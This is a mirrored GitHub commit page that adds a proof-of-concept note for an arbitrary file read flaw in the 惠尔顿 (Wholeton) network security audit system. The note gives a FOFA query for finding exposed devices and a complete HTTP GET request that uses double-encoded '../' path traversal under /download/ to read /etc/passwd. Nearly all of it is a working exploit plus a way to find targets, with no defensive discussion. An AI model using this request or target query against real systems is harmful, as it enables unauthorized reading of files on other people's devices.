mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 惠尔顿-网络安全审计系统存在任意文件读取漏洞.md
This commit is contained in:
parent
90c1802379
commit
b4038fa094
19
惠尔顿-网络安全审计系统存在任意文件读取漏洞.md
Normal file
19
惠尔顿-网络安全审计系统存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
## 惠尔顿-网络安全审计系统存在任意文件读取漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="惠尔顿-网络安全审计系统"
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
|
||||||
|
Host: your-ip
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
Connection: close
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
Loading…
x
Reference in New Issue
Block a user